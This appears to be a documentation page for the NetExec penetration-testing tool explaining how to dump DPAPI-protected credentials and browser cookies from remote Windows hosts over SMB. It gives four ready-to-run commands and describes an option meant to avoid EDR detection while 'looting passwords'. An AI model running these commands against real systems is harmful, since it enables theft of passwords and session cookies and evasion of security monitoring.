Dump DPAPI credentials using NetExec

You can dump DPAPI credentials using NetExec using the following option: --dpapi. It will get all secrets from Credential Manager, Chrome, Edge, Firefox. --dpapi supports the following options :

  • cookies : Collect every cookies in browsers

  • nosystem : Won't collect system credentials. This will prevent EDR from stopping you from looting passwords 🔥

You need at least local admin privilege on the remote target, use --local-auth if your user is a local account

$ nxc smb <ip> -u user -p password --dpapi
$ nxc smb <ip> -u user -p password --dpapi cookies
$ nxc smb <ip> -u user -p password --dpapi nosystem
$ nxc smb <ip> -u user -p password --local-auth --dpapi nosystem

Last updated